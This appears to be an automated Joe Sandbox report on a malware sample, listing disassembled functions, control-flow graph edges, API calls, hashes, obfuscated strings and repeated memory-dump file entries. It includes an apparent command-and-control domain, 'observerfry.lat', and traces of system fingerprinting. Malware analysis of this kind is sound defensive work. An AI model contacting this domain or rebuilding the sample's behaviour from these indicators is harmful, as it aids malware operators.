                                                                                                                                                                                                                              • API String ID: 237503144-3451580660
                                                                                                                                                                                                                              • Opcode ID: 038b37f53c9da35e1adcc8487fa2c48efb8f36b83766cb92a395f9cf269afba3
                                                                                                                                                                                                                              • Instruction ID: d72fc20e10f779387c261f8f5e8b9fd7adfa1dc9d42ab2e05daa33251cca9356
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 038b37f53c9da35e1adcc8487fa2c48efb8f36b83766cb92a395f9cf269afba3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F71226B1E11205CFDB14CF69C8826AABBB2FF85310F1981ACD585AF355E7389942CBD1
                                                                                                                                                                                                                              Function 00FDCE45 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 342COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1553 fdce45-fdce78 call 1003fd0 call fd9780 CoUninitialize 1558 fdce80-fdcee4 1553->1558 1558->1558 1559 fdcee6-fdcef7 1558->1559 1560 fdcf00-fdcf20 1559->1560 1560->1560 1561 fdcf22-fdcf64 1560->1561 1562 fdcf70-fdcf92 1561->1562 1562->1562 1563 fdcf94-fdcf9c 1562->1563 1564 fdcf9e-fdcfa2 1563->1564 1565 fdcfbb-fdcfc3 1563->1565 1566 fdcfb0-fdcfb9 1564->1566 1567 fdcfdb-fdcfe6 1565->1567 1568 fdcfc5-fdcfc6 1565->1568 1566->1565 1566->1566 1570 fdcfec-fdcfed 1567->1570 1571 fdd08a 1567->1571 1569 fdcfd0-fdcfd9 1568->1569 1569->1567 1569->1569 1572 fdcff0-fdcff9 1570->1572 1573 fdd08d-fdd095 1571->1573 1572->1572 1574 fdcffb 1572->1574 1575 fdd0ad 1573->1575 1576 fdd097-fdd09b 1573->1576 1574->1573 1578 fdd0b0-fdd0bb 1575->1578 1577 fdd0a0-fdd0a9 1576->1577 1577->1577 1579 fdd0ab 1577->1579 1580 fdd0bd-fdd0bf 1578->1580 1581 fdd0cb-fdd0d7 1578->1581 1579->1578 1582 fdd0c0-fdd0c9 1580->1582 1583 fdd0d9-fdd0db 1581->1583 1584 fdd0f1-fdd1b1 1581->1584 1582->1581 1582->1582 1586 fdd0e0-fdd0ed 1583->1586 1585 fdd1c0-fdd1d2 1584->1585 1585->1585 1587 fdd1d4-fdd1f4 1585->1587 1586->1586 1588 fdd0ef 1586->1588 1589 fdd200-fdd252 1587->1589 1588->1584 1589->1589 1590 fdd254-fdd28a call fdb7e0 1589->1590
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                                              • String ID: 6=.)$<1!9$`{tu$observerfry.lat
                                                                                                                                                                                                                              • API String ID: 3861434553-2148362831
                                                                                                                                                                                                                              • Opcode ID: 6a6a103b5b225d320fce81685288ddde70f2645b1594343fea5b082989c8e4bc
                                                                                                                                                                                                                              • Instruction ID: 503d4e7f762992973a5676acbd5f6af23aef12a315f0c14f40eaa69ee1776b0d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a6a103b5b225d320fce81685288ddde70f2645b1594343fea5b082989c8e4bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90A113B56047818FD726CF29C4D0662BFE2FF96310B18859DC4D24F75AD33AA846DBA0
                                                                                                                                                                                                                              Function 00FD8600 Relevance: 4.1, Strings: 3, Instructions: 356COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1621 fd8600-fd8611 call 100d9a0 1624 fd8a48-fd8a4a 1621->1624 1625 fd8617-fd861e call 10062a0 1621->1625 1628 fd8624-fd864a 1625->1628 1629 fd8a31-fd8a38 1625->1629 1637 fd864c-fd864e 1628->1637 1638 fd8650-fd887f 1628->1638 1630 fd8a3a-fd8a40 call fd7f60 1629->1630 1631 fd8a43 call 100e080 1629->1631 1630->1631 1631->1624 1637->1638 1640 fd8880-fd88ce 1638->1640 1640->1640 1641 fd88d0-fd891d call 100c540 1640->1641 1644 fd8920-fd8943 1641->1644 1645 fd8945-fd8962 1644->1645 1646 fd8964-fd897c 1644->1646 1645->1644 1648 fd8a0d-fd8a25 call fd9d00 1646->1648 1649 fd8982-fd8a0b 1646->1649 1648->1629 1652 fd8a27 call fdcb90 1648->1652 1649->1648 1654 fd8a2c call fdb7b0 1652->1654 1654->1629
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID: b]u)$}$}
                                                                                                                                                                                                                              • API String ID: 3664257935-2900034282
                                                                                                                                                                                                                              • Opcode ID: 673f99b8d3e7e922d335d53c15fc2a9e0a2a1c9fa13639dfc00e386d77a25ab3
                                                                                                                                                                                                                              • Instruction ID: a4c6eb9eca494ae1ab4de3b25654ebb739f96085e14cc988baa2bce384250046
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 673f99b8d3e7e922d335d53c15fc2a9e0a2a1c9fa13639dfc00e386d77a25ab3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7C1E673E187154BC718DF69C84125AF7D6ABC8710F0EC52EA898EB395EA74DC058BC2
                                                                                                                                                                                                                              Function 00FFD34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1656 ffd34a-ffd362 1657 ffd370-ffd382 1656->1657 1657->1657 1658 ffd384-ffd389 1657->1658 1659 ffd39b-ffd3a7 1658->1659 1660 ffd38b-ffd38f 1658->1660 1662 ffd3a9-ffd3ab 1659->1662 1663 ffd3c1-ffd40f call 100fe00 GetPhysicallyInstalledSystemMemory 1659->1663 1661 ffd390-ffd399 1660->1661 1661->1659 1661->1661 1664 ffd3b0-ffd3bd 1662->1664 1668 ffd410-ffd44d 1663->1668 1664->1664 1666 ffd3bf 1664->1666 1666->1663 1668->1668 1669 ffd44f-ffd498 call fee960 1668->1669 1672 ffd4a0-ffd551 1669->1672 1672->1672 1673 ffd557-ffd55c 1672->1673 1674 ffd55e-ffd568 1673->1674 1675 ffd57d-ffd583 1673->1675 1676 ffd570-ffd579 1674->1676 1677 ffd586-ffd58e 1675->1677 1676->1676 1680 ffd57b 1676->1680 1678 ffd5ab-ffd5b3 1677->1678 1679 ffd590-ffd591 1677->1679 1682 ffd5cb-ffd611 1678->1682 1683 ffd5b5-ffd5b6 1678->1683 1681 ffd5a0-ffd5a9 1679->1681 1680->1677 1681->1678 1681->1681 1685 ffd620-ffd653 1682->1685 1684 ffd5c0-ffd5c9 1683->1684 1684->1682 1684->1684 1685->1685 1686 ffd655-ffd65a 1685->1686 1687 ffd66d 1686->1687 1688 ffd65c-ffd65d 1686->1688 1690 ffd670-ffd67a 1687->1690 1689 ffd660-ffd669 1688->1689 1689->1689 1691 ffd66b 1689->1691 1692 ffd67c-ffd67f 1690->1692 1693 ffd68b-ffd73c 1690->1693 1691->1690 1694 ffd680-ffd689 1692->1694 1694->1693 1694->1694
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00FFD3EE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                              • String ID: ><+
                                                                                                                                                                                                                              • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                              • Opcode ID: 18fda4270dc9f6ab395345f62deffab040aedbf255bce458c7f374117601e7ed
                                                                                                                                                                                                                              • Instruction ID: a7b58908ba218dbf5f2dbd27db7ae020e76898ceaa1f68486261efd5b814933f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18fda4270dc9f6ab395345f62deffab040aedbf255bce458c7f374117601e7ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91C1C475A047428FD725CF2AC490762FBE2BF96314F28859DC5DA8B762C739E806CB50
                                                                                                                                                                                                                              Function 01010D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
